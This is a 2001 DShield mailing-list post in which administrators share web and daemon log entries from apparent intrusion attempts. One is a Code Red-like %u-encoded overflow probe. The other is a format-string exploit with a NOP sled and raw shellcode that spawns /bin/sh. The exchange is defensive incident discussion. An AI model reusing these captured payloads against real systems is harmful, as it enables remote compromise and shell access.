[Dshield] buffer overflow?

Stephane Nasdrovisky stephane.nasdrovisky at uniway.be
Thu Nov 15 15:26:20 GMT 2001


The only unusual buffer overflow probe I've seen is this one:
195.130.248.102 - - [21/Sep/2001:00:19:31 +0200]
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

It looks like code red, but lacks the "default.ida?". I guess it was a script kiddie in search of new feelings.

ALEPH0 wrote:

> Found these in my logs (copy/paste from vi).  Looks like a buffer overflow
> to get a shell attempt.  They are in repetitive groups and on each of my
> servers on one of my networks.  Anyone know this one in particcular and if I
> should be concerned?  What I don't know is what is SERVER here.
>
> Nov 14 20:43:31 hostname SERVER[4302]: Dispatch_input: bad request line
> 'BBì¿í¿î¿ï¿XXXXXXXXXXXXXXXXXX%.172u%300$n%.17u%301$n%.253u%302$n%.192u%303$n
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P1Û1É1À°FÍ~@~Iå1Ò²f~I
> 1É~IËC~I]øC~I]ôK~IMü~MMôÍ~@1É~IEôCf~I]ìfÇEî^O'~IM ~MEì~IEøÆEü^P~I ~MMôÍ~@~I
> CCÍ~@~I CÍ~@~IÃ1ɲ?~I Í~@~I
> AÍ~@ë^X^~Iu^H1À~HF^G~IE^L°^K~Ió~MM^H~MU^LÍ~@èã/bin/sh'
>
> I also run a bunch of homebuilt fake logging daemons on many trojan ports
> and found on this same network a lot of activity on port 27374 starting a
> couple days ago.
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see: http://www1.dshield.org/mailman/listinfo/dshield




More information about the list mailing list